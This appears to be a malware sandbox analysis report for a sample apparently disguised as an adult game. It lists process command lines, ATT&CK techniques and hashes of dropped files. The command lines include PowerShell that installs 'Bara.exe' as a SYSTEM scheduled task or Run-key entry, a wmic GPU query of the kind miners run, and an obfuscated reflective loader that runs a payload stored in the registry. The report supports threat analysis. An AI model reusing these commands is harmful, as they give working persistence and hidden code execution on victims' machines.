  powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5504
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe ujznpffbjbh
  2⤵
  PID:6076
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:1172

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4d5ecd9c-e503-4ab7-8170-81c050ce4628}
1⤵
PID:5328

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2fc0feb0-8ca8-4fae-bc58-082f5639a42e}
1⤵
PID:3108

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2fc0feb0-8ca8-4fae-bc58-082f5639a42e}
1⤵
PID:4408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tstq25xa.umt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD65B.tmp.bat

Filesize
148B

MD5
5a94f039be70c32a40b58335d4c95940

SHA1
181eb41c86afa96a4214d5634e92391251bb547f

SHA256
221019a7a3efda3142b0f6a531d9701294d385fde1dc4185af8db7dbb14b795f

SHA512
78e2e9b238521afd0c22a31e51f728069024c312408f04a45b286eee370b0c8a6331b8368064c3f440e522f49135cff98a5b75cee692a0f35b74c7031fa8dc82

Download Submit
C:\Users\Public\1.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Users\Public\2.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
C:\Users\Public\A.exe

Filesize
47KB

MD5
15f1cf8ffccc4605c2a3f4077082042d

SHA1
d485db86afa25b717e7d970f69c6ddbf40be224c

SHA256
009f873e8dfa5ba71f6a82cdccda0fdb47c5b57f4e3c8eaf18b41c3af52e7506

SHA512
b8fdd16cba4ce60cd710fb29473bfddaaa519edcd932e6ede3d903c29ac6c67b42e542881b580b4bd8946566e8f0b0b2b4be9969ff8d8eea84521bdc58fcf0eb

Download Submit
C:\Users\Public\Enkou_Succubus.exe

Filesize
4.7MB

MD5
c6dcdafaf55947371fac40c998682674

SHA1
434ab04881d558d85b8f8efb421efa6efa65289a

SHA256
49dcf097ce9e73f035ce561823d90a1f6988a9daf30dc03a78b5e28ed659296a

SHA512
dcaf4165cefefada6b175bf4cecfb80decf6b139749db24ae60fdec635be8d60701e4a230f22cc4bd8f50c6524a5e35e0da378ce12b153975c6b3451db5d137b

Download Submit
C:\Users\Public\Q.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_down.ogg

Filesize
18KB

MD5
e13e323d86f3be7db52b61b5d8efc5ae

SHA1
f9016fe6711d33820791470d94e44196a8a9ace8

SHA256
c553aae0d009c1a8f59918f3c3ade97955dd024cc3f1f1e6feaa57d691c4fce8

SHA512
c9da7d06f6a4e94014bdfa173fef33392e5a6e92107a53b100b59121854307fa33a258d502788b295e144436703670aa6391dac4e3516953e657b39b428c6486

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_end.ogg

Filesize
151KB

MD5
fadb2fd0f4187b1e708eeba667c282bb

SHA1
21a39158b161d95c23eb87722eed5132fc5ed89e

SHA256
2ae20ec6acd9572f018da7b37cd85b3a86158983a57e08cb789a8c29f177f3a8

SHA512
1040935289e51767b63253a41606d43c1a58c3c24eb5f4754444676e88636af5e9d6a4e8f7c734c4ec563c88b0247c02943183a0b4b77620195e5c7ebd3e32c9

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_start.ogg

Filesize
12KB

MD5
733b5f992a58f48f78f0efa7426c5f29

SHA1
98e2f1788d5bc9ba88f6a476e281adc90fd3304e

SHA256
8b68f4f7f2a1412f0d428992352eeeb57689d853c2544e88bc39b12d548f5c93

SHA512
6a1348b6f30a21784c97d06bf00cb1447dcf4473a2c32c9a1d36f4d6dbcd159b57f66b890b2afb4374aa6e0006f22aa3b1ee00b52c14636e8de29a7c78cd4942

Download Submit
C:\Users\Public\ResourcesData\Audio\Blowjob_up.ogg

Filesize
27KB

MD5
c550d7d2970ab6d2af28ae7bb3f9d7bc

SHA1
b751ff61c24d5e6806d87b7a09b70c4dfe2a70b6

SHA256
d2f5ccd7cba15925eb78c126f88324a2416fd275abc1821ccfbff2626486be71

SHA512
2a49963e4af4a1dbfd8002f8609d5ab8d61cb6c387117ecaf35a63ef7c978d213dd37635941500e2ebd8644d51a4ca66aa8cc4a8e2237bb4f3b9ef678f647324

Download Submit
C:\Users\Public\ResourcesData\Audio\Cowgirl_collision.ogg

Filesize
48KB

MD5
eb1a1f975de71e444823e79b6445c97d

SHA1
6c13d92a8383e44b8a143335366845cb8dbaa08a

SHA256
58769d7cab2982cd17173137dd2976b640624e14b29e6732ca4c478252de379e

SHA512
e56807a597a7214d2693402ac0addc2fbd6cafee201d966cac4b0d45f324dd238bcbbfe56d7e0a3a7c15cf40f1d4c84dddf4ab06e3adeafe559cb5ebea994ba5

Download Submit
C:\Users\Public\ResourcesData\Audio\Cowgirl_gasp.ogg

Filesize
18KB

MD5
f9a9e0a19810b3308d36bb77a5e84626

SHA1
8c120a409297ec7b0593c61e25584a604ca720df

SHA256
8923c0832fe0f9ee3a09aeed6a2fbfe4902159fc0f866de1f6e7bb2c735c7ea2

SHA512
077d36a07908ea2d13a3e942a5eda5cee63ceef3b327b86b8a862f80a44c37b25a24591143b559d196e7d238d600cdb5682db6e4d1256bcfed4ede1d3374e25e

Download Submit
C:\Users\Public\ResourcesData\Audio\Meta.ogg

Filesize
39KB

MD5
1655bfda376f8e70e5e80790828f495e

SHA1
fa4f92362e73562d462240b12cecb043e35a9b91

SHA256
3ff1999576f88a379d07d4df3f9aa7ec76bc89d52d30e92c72cdba109e0694a3

SHA512
3bb9347fbd864756c3c1f8afb42837fcf37109747f75e35dfda45215e23ca38f1c90abbb429ada5e390f80276e69dece0a6955551943b2640b0f9d92b9aa1d4c

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_collision.ogg

Filesize
10KB

MD5
b6502984bf4c92d148a15b9377952856

SHA1
68f9ae90c1bac6538bff8242be7daf34415ededa

SHA256
948dd672f8d8aa1ced2692317679b7ff8d23a223a9d3fb980480f52b434bfdda

SHA512
26744448ca71a28842c97579fdb9440c5b649d97beb430d6e4fdbfbbd5b21ef1c9de830befcce31175e82ab7d0cb58a24bfc7de4c4c6f854fed02056bbd08a78

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_cum.ogg

Filesize
19KB

MD5
3b91474097e34e6fbfc313ba77d1f153

SHA1
2fc01f5403525450e45d7408a54270aa3bb3aa0c

SHA256
3d730191bfe0a5881458af56f2c821077888aa6146063bb1717a61593d798cc7

SHA512
d748cbcf962d2e802bd00accdcc2e112d3c395b1b5c98ed11c8a995bc6c65bbb542be1dfcf61d0c865d697b07ac7e49bb9d6ed86600c7bf515ccdb39602ac074

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_friction.ogg

Filesize
27KB

MD5
aa3215ac125ea8c21ec4e82907065727

SHA1
8664cc20c11b2ed6a86395c399daf49567570c16

SHA256
cd45fe271cac4d459ee5169db16a8bbc4b84d242f4079c05897fb86ad1b9d5e4

SHA512
bd8f7311fe4f4269bfa207f5ae328c6d60e4bab14f72ad7ddaef0906cf53dd0125f03e50e0c24e13c5f65170dbc99a4aee9b0b273b2a14a9a33e78991a9b9b9a

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_1.ogg

Filesize
10KB

MD5
35e4579224d38d38835d5c9c0ebc0925

SHA1
a7c3f92ee7a897aa8386df58465393c028c7160e

SHA256
a60986d1222e72c784f594e9f01f34a8a4e2f481c49e065b7ff321ebc90d4a26

SHA512
9de018993fce36b13386a234e230dcca34a7b0784e855f2510267c9a40d5c70105af9d2dca7e95a520942d70c53ca7c744bbe391f3ad86bfca7610178adbfce0

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_2.ogg

Filesize
8KB

MD5
0753c17a244073a518f6559c688950b0

SHA1
c0e7bc93af20a0ed4f355c684549ce67b06ee4b0

SHA256
0628e9f636af8e61394931cba3e32ce6ee93cd89ac425c9f9d40c308bc690398

SHA512
10cf947020f48c04a92263d9311204608fb7a1a470536b4505eda9fa1fff12ca2c65607b1238d668d8f9157517c37a43b1e58d0d942613aefe0967e047f3af21

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_3.ogg

Filesize
8KB

MD5
66fb6fec58cdb558118bc3bd52e1f0b5

SHA1
0c3f660740c5ada176fb7f2ac95b139c3deffe5d

SHA256
64bc8fa5931997f9dbb822a06057bebbe313b6bad08a929cc62b21872541b827

SHA512
9cbd1f411835f2c9c71efedbf0ff4c3b893ca69c02f444beb27685a74c6f4aa7cc61575bac45cb0838575d5a6b335b5028427e199e4eec8bf6597909902597ae

Download Submit
C:\Users\Public\ResourcesData\Audio\Paizuri_gasp_female_4.ogg

Filesize
7KB

MD5
5529643e6d5ad1515d192907fafea220

SHA1
932fcbda8a579e2f37eaf1138e985318c9100045

SHA256
d6de3d5ccd9e99ef6781a4bc862199a9165b49e0196c560383ed869537721a43

SHA512
02b8920db70712557eb134b9b872a7df98a9a113ef34d0bdb917276d7436c28b9b01b292758a18ddb678ac48c984e198932c1dfb761693d004a44bd4404396c5

Download Submit
C:\Users\Public\ResourcesData\Sprite\Background-sheet.png

Filesize
105KB

MD5
0a505050c1cb69477cedab3833c33c30

SHA1
a07da42f06cb5687d6dcaf7550fd9e1dc8bb0cfb

SHA256
4d398757cf4220ebd5fc75fee67d8bd9e55efe4a580e78f05d693ef2295c2df3

SHA512
1228f8d3bcad7e19f93d4b81a60ad12e61cdd623bec79003bc4e4454d37070c0e908068909ba02888c9e0ca95be45e6abe523188710e81be0d4f892f5af28a9d

Download Submit
C:\Users\Public\ResourcesData\Sprite\Background.json

Filesize
4KB

MD5
3c3f6436ea377bb39872888466200152

SHA1
0bc73671f602bba5f1b6c4cb28afce509bb4ee59

SHA256
411340ba1c537b53c29d9a7b2e6da2bfafb7867e57835d44cf1b94827947d9f7

SHA512
96575577febbef2bc1c5e7776f5ce164f7246f4c7eb9b6a5bb3e5e74c46d8fde5bc3541e07e0c74c0af729905d64ce133c1a7e9d7d73415cbd8ac4d188827d24

Download Submit
C:\Users\Public\ResourcesData\Sprite\Blowjob-sheet.png

Filesize
164KB

MD5
3c38588559f70b4df7754befce6cdc86

SHA1
fed72e8c7f83126fc4dd7bc3bbecf3a2b36355db

SHA256
3c52873173de4bade927cf53b0be618ea9546747e4b1aa36913838ab71b4382e

SHA512
dd06a7c302da6d0c8323b2acdd244bfb1f1f7902835a0806da835347254f697ab6dd86aaee4c1a15c909f81f2b469a3aec5c613c6b218323c787177fc02b41c8

Download Submit
C:\Users\Public\ResourcesData\Sprite\Blowjob.json

Filesize
19KB

MD5
3d8e847a6b4c1f1f70638b2b78d0806b

SHA1
3561828a08e923449d0d2468296648e6871a6830

SHA256
c8fffd47d62fc6be7f63c4a183a6a3ae781a1514f528959511cf7dd8bce0c24f

SHA512
855da9fbaa8b8cb5d50b093957ad34be64ae5331c97c68788a6df27d13b127a5562c0c2ea583aaed2960db7dfba5adbeef15427e3f6fb51d0068577673ef1038

Download Submit
C:\Users\Public\ResourcesData\Sprite\Button-sheet.png

Filesize
416B

MD5
ebc707659e15de88766063d51a49bee5

SHA1
9ac62070e0e84bb3eafa7b9dd643699a3defdfd3

SHA256
2a87641381215e8bb240816413908edb3228ee28a823fd02fc4c71f53713b7ec

SHA512
3d3bd73865e9fd5e58d15b17050cc2bc87deda1d602da03f5612977ebbd1754e5f9dbd9d809a724d83841d2ed3be8e3747adffc83210464b35967f723f689efc

Download Submit
C:\Users\Public\ResourcesData\Sprite\Button.json

Filesize
922B

MD5
eac75c1f6d27eea3dbe9970e26347a9d

SHA1
0909f674f8b166841c05d420e12dbcfd104bebdd

SHA256
c62d72e242a086f5aac2142c279d1946f3adae09192dbbf318c55f1ff19ae8f5

SHA512
fb0095f7faacce2433183afafff951d7455577abede43ea9cf95906b96de2e5c020e013e2ff7c02e2e02e627489218506bdc50ac293c4cc56b67b4ff010959f0

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_frame-sheet.png

Filesize
724B

MD5
8574cd70285c47f80827167734db5f2c

SHA1
8112d629818c04aa1abc7d1b22b8e9d33395b599

SHA256
daa0ffa07077e3be33b1a64b6ca3ca01db0dae2ae234b6659ad90b483913b546

SHA512
c2b8d1b6f08762ef70e545161dc684c5f836213c5c3f2d63775380addabbfde28e242b4b1662272a42f07123294da77dd60fe9f997bc3f76e998cca91defcb45

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_frame.json

Filesize
947B

MD5
4b21d2428fe66d914f01a39eae1469ac

SHA1
83e343a51d6442c3647042713e35e55c8b40467b

SHA256
9caa7a8da520224d0c7fd6c409930e89cd4838f1743cf5f0185cd22dd863dd52

SHA512
2489e745fbf4e0ff66f98b517c3b8f1259e6559e011a9068fbf7340bb60d4cf42214cdd47c8127cf8a94be637d530ba7ec102856292af74cc4294d739b73b05c

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp-sheet.png

Filesize
5KB

MD5
5036a88b9aba929ca7dcd0baff9bcbfa

SHA1
598a3543e91b4a2a90f750ddd2ab2111c51239e0

SHA256
6aa2fc94c41ce9ec967cf957e1a28d4c7f88b2b293566cd2e09519f90458f2ba

SHA512
143c1eb6962c94ab4b284732eb8df4f77711fa67aa80e58d72923336c1bcbfa59b62323861ebd66bd31335ce06f4a347bee2bfa3dc20f5a04ab16edc2f0bf669

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp.json

Filesize
1KB

MD5
ff01cd3e6acae43c67267ff3a899c299

SHA1
59d4521196a11035ebf1addcc4949d40ac0a7a31

SHA256
b0dc18db31b014fa6801ab88d6caa6bb37e49cffdca1d90061d0f922ae40255a

SHA512
320cbe15fe32ff74b6d4fc1855d400b4fef0674edb63caaaef562c7abfcd4cd482c09c9ccd73e16ffd80409c30d0f7d72f5d49f6cb01b20c08f2b41501371568

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp_l-sheet.png

Filesize
5KB

MD5
f2bdb5146b60f010e51a432e3d2c158d

SHA1
d5070f27c4ec8aa8924d13eb4af12d4fcaa9d50f

SHA256
8485d7f54a0eaefc21404abb1bde6fc00f51d53d205b5d5fe622ac7b610506d3

SHA512
4edc444947544eb5a6224bf90959d9aacc6682afe276128b028ab67bda3a21e8b82d3f43005a3d95e2d6f10ccdcc345e62ef6151acd009fbaafaf6344f5c318c

Download Submit
C:\Users\Public\ResourcesData\Sprite\ButtonCG_sp_l.json

Filesize
1KB

MD5
4ab5834e8a85aa2d5a931042208165ac

SHA1
6c2b2b25139da96832a984bf640fa674f3403b24

SHA256
c48e054f21e43ab746e4fde83aeb2f9473e7b7fdf3850c5b0fa40b7fcb1258c1

SHA512
6cb7cbe695c4a0bd8457f09ac552fdfc4047903d5c573107094742ed4333e13da685d8716aae1a7930dbf447bb597705c5dcd29aa9bf58fd5e066d9c1c074b79

Download Submit
C:\Users\Public\ResourcesData\Sprite\Cowgirl-sheet.png

Filesize
71KB

MD5
effcb1a24cb53b09bc87a69953856131

SHA1
9ea5123bd7ab23f3c65e18ae7a4d5526ce5eaa96

SHA256
fe96918d0fa882ca2cb105aa9645741f3e42324f84128b317d0217236568c46a

SHA512
d9ff44831ecded82152e78a596e25fb0fe7a557c8ef3edc564f286c8f5e567cfd88b96a58abc8c3af029364d78d5327e9956cbb98794b2541f370cd6bab34fba

Download Submit
C:\Users\Public\ResourcesData\Sprite\Cowgirl.json

Filesize
18KB

MD5
29cae2e2a6eaef571b1cf76a0e23b4a7

SHA1
350d007c50a683f146f38a5f7e1ce65c5dea4cab

SHA256
f7ea349068a56f94922268481153a21e7414d8236e64d114e047f311b10e051f

SHA512
eabfb429890f22e8365e6bb4e66003cc38a35cdc76a1d4819ba44bf16ab183dac88c615bb1dc4a23f6f08a1f923bf297405a5b518cd776c1c4cc65494ee9a51a

Download Submit
C:\Users\Public\ResourcesData\Sprite\Hotel_BG.png

Filesize
10KB

MD5
593b69d71901e909a4674a2fb0ecdf25

SHA1
54ef6bc91bb87402bd7956f2111bfb0495ad771c

SHA256
88ee16187935cb0aca7ac604ae97852647eae7c8256fdcd18e71274e3bb42283

SHA512
9a3967ee1b110a81119ea2fa5844e44d19293b199bc924cd33429483ef780b98c6ebb97ff3401c39de08b0f5a7b198f4ee5854e9497dab608ab0dc6978f1d0fa

Download Submit
C:\Users\Public\ResourcesData\Sprite\MetaCG-sheet.png

Filesize
62KB

MD5
154832b0311a1c3acfa6e1fbf01b9eb3

SHA1
2522471db880172bef82d47ab283cb7d57b1b9cc

SHA256
72175466f8b4700014e6517354d8cf95cec8fedd2d62947134a36326021c2cfd

SHA512
8da3e3b56b6a010142ffaac65a5f5506001be2b4d7152d46b8f61e02186b6772f6220d46bbb4fe681b06648de38c6ea849450588993674f4f02f49af542111fd

Download Submit
C:\Users\Public\ResourcesData\Sprite\MetaCG.json

Filesize
4KB

MD5
af29816b55136c201e7af3f5da99bbb4

SHA1
0f3fc3fe98f10ec5bd1c777705c06836a9ce7bd9

SHA256
63e5083ecdf583b5684a893c1e46752737e820383c94ab08c51126fc62d2de88

SHA512
be50a0416c891e57c7b49e1787d16857964b2c592f96892e81392c838473903d47e23f044d8a82e4c6cc87b4a6e57975595135a13e2acb5efd875f6da01ece26

Download Submit
C:\Users\Public\ResourcesData\Sprite\MouseTip-sheet.png

Filesize
803B

MD5
f2b38384384fab69bde4baaeb51367f3

SHA1
aa1ba21fbecd486355fcc44c1ce5d20250e96dfe

SHA256
8684e310b04d6abe261423a5987fdbb48ae8e71e041fa2452fd4e5448237f498

SHA512
8e5e99cd756f2605a83f3f9f83e41b9c69f7c97cb60900a649ac0b9ae448dea6745359831593617b9ab822e09b04782c7d1e47a6fb63dbca10640e0e2a30e730

Download Submit
C:\Users\Public\ResourcesData\Sprite\MouseTip.json

Filesize
1KB

MD5
70c76e98cccc31ba0f675e54300eec2a

SHA1
4030f358ced53be2ca946915dbec9caba43134eb

SHA256
44ad8bd0368f6df7eedc71e58c37e88fc5e7672a9ddf73edca0ffcbce4139e0a

SHA512
b254ab81f230b11319a40941276cad013209ef14c4d9af93996fc0341081dff58d67d22b6ba855927dafd4ecfbc5f2b0dc3fb273ab88780f81aefc7e92124f45

Download Submit
C:\Users\Public\ResourcesData\Sprite\Paizuri-sheet.png

Filesize
355KB

MD5
28734942940187b95083ccb43d25c83d

SHA1
bcc206f46bae33d212b0d25e25e2bec127219987

SHA256
904789b53990eb0acfa193ac87485853c2d52211d52a9612fbb9405c02172559

SHA512
af25c2cb62bd592aa11e4c0d384c57d97a9a6b8dae7d4b1e1ac3335b240b4185ff4fa2fadae98c51ccadfeba0f84c7be56b7701aaee1e9340ddaabc6d8c3cf00

Download Submit
C:\Users\Public\ResourcesData\Sprite\Paizuri.json

Filesize
67KB

MD5
02d6708d7d745e61787b784914b36082

SHA1
520f1615f467bbce6de87e7310754c28eb03f5a2

SHA256
676982f4107af90e6acc3653482b1dc148f4b9924b9c1521d4cf4039f8f8e31a

SHA512
bc9b2df96b45e4bee9f208db9bc4106b559d55c6d84c083bd86be4facec2958cd83e3a577601a5ac7f1fa9a97e1e092cdae7660dc0cf7cdc542b3f1d1b941744

Download Submit
C:\Users\Public\ResourcesData\Sprite\Street_BG.png

Filesize
10KB

MD5
fc4342a07e072209dd3f5dd775e47085

SHA1
076fbac57ff1eaba64886c3c5cdc52266dfcd857

SHA256
5ea6425a4c81f2d60843aed74b080a3ebb0c82fa83e88cec6426fe77532c6800

SHA512
29000a77c69f0cc9a675b5eb8f1fcacc3050892d7388803956bdd39f960131e36aa298613c42ffca1258c1b58df3016e46433c7a83851fb1bf4e339a01753244

Download Submit
C:\Users\Public\ResourcesData\Sprite\textbox.png

Filesize
516B

MD5
dfc0e0df4b6980450a1db2ad9755e2f0

SHA1
ceebafcbeef2a49cbbd131e805dde3f1219645d1

SHA256
d6a45e73410ed028912581dc0c13d941546f24796a860c4463b82813b4df0333

SHA512
7f6765526f93855c26312fdfec14010611d694ea65eb5ee049f4d06a2a7c096e4ed672160b3d223a3e0268fbf227e21cf99c1b85d6d9e557aa72630a7ef3792d

Download Submit
C:\Users\Public\ResourcesData\Text\dialogue_text.json

Filesize
7KB

MD5
800fbff2d044a06e14b31d49086886fa

SHA1
a28118016f36df761c7396b2ed4aafaf05d6ff9b

SHA256
597a4317fbc3433f62fb97a9b28bb2ac99d038c7529af71b3cc346c26123ba7a

SHA512
2154ed5dbf20083c848ed5aaccf42231006f342d0ac7b737bf54091461dacdcac140bb10e6eb5f1bb1c9f5882c8c0067feeda018cf2bda0440fa6255fbb399f8

Download Submit
C:\Users\Public\V3.exe

Filesize
5.4MB

MD5
eb69caec953efdfd87cd1378483b4b4a

SHA1
2e4f400a7ad6c97dfff983cef6f27f32d8cd4263

SHA256
2d3cfa62bbb948323263afdd50cf75e8454be04be362b18e968f99b360f219de

SHA512
cf0e974880c72db0410c57e1cc8136826ef8496ed9b4daaf74175d11264457da427c0107b7ea4240f9696a2a15149f688131af215a5ad1ff857f85859170f1d4

Download Submit
C:\Users\Public\config.bat

Filesize
593B

MD5
67babfd11986db3fad24bb95603f7343

SHA1
018c9dd244f1ee7feb0d58a60aa3bf6320405a35

SHA256
77f93618988472394b5feeadd426a62cfb8e9a1e2a1ca891e76fa66584e31950

SHA512
7ce17b373518053fc88526b63e4421111bee51d0699a43f5c1e63f219978a9007a591ea42498d826afc285b471d274c7df8c9f3750538ac4308d17c0feb6c26b

Download Submit
C:\Users\Public\data.win

Filesize
559KB

MD5
ca6176352fc32ca64769364a0227ed1b

SHA1
e1d4c39125f1f04bbf8f0f889c2f23831cbd1abb

SHA256
8ad9edc24d56453b5961dc97c80bd17f394fc300464d96979fe1302d963a087e

SHA512
6ca01ccaa18b6b7c6cb50bee9db6a7013903709a8d1022a22553e4ca55d98146963efee33682500f1d719ed57514e888b78c507566c9e740f4914df1670a7ffe

Download Submit
C:\Users\Public\display_measure.dll

Filesize
73KB

MD5
4a10d0890322cf89cd08282a80c8d2e7

SHA1
e38b6374f17415d5f53611b08cf790fc652e2999

SHA256
048b8d07b3399761e8d2b32adf7db6c4563d8bba018ae741da26eecd324e5295

SHA512
343b3527d76d45d8416538444b971ce18a13231b8b6fa8144f91c7ee2f1e7ed2db8f975a6d0ad07b6449e1c5701a71923768805290805b24df8c6a5a2dd148bc

Download Submit
C:\Users\Public\display_screenshot.dll

Filesize
76KB

MD5
c4aa222bd80161a582a73bd8111148b1

SHA1
ac0ce00aa48598434151c5f0333d95337a29e27e

SHA256
8e1e23eac5672d477fa597c8641c5e55cf2f2fb28bade9703136f3f1ec56748a

SHA512
11989b5120367e8793c4bb75d8dd20d7e66dd7aaa1054852f9225c36c362547c90265290c5e2dba47a69bbc4f14682ecaa64ce963861c1484080521d485fa85d

Download Submit
C:\Users\Public\options.ini

Filesize
96B

MD5
db94e9c99808f88011644ba34d993ff6

SHA1
fadfdde548d7875e59a6c3ef4387995ff70edb9e

SHA256
74518f2550169c01089c2bf4e80fa73ee555ad21dca50d92ba061648fac0e0ef

SHA512
b15932a92905f525d92b81aeb823c58701c638b76188da148bb30a035629ad34cc5d6c778914ad8d9b6bc024fbf06bf300eb3887edbbd4a277bcd16c3a1c45a3

Download Submit
C:\Users\Public\window_progress.dll

Filesize
69KB

MD5
eb7466e9de3128dc4a61a26c9d6f93a9

SHA1
715d1880e5754f1f3adbea0a345b207c42b2a267

SHA256
e46f0252dee3d206f4e453c9ba351a1e85249014d10bdcfb6aaafc388e2731e7

SHA512
7b6b3f0034dfe4f610f0726128a2118b6f5488bfa7d11f4e2f7c5ba677f584d01f1d7abc7788abb6b63df5a86181660ec4831e7dd870b5fa4c8ad6d065a6aa60

Download Submit
memory/380-391-0x0000019C64590000-0x0000019C645BB000-memory.dmp

Filesize
172KB

Download
memory/380-392-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

Filesize
64KB

Download
memory/612-383-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

Filesize
64KB

Download
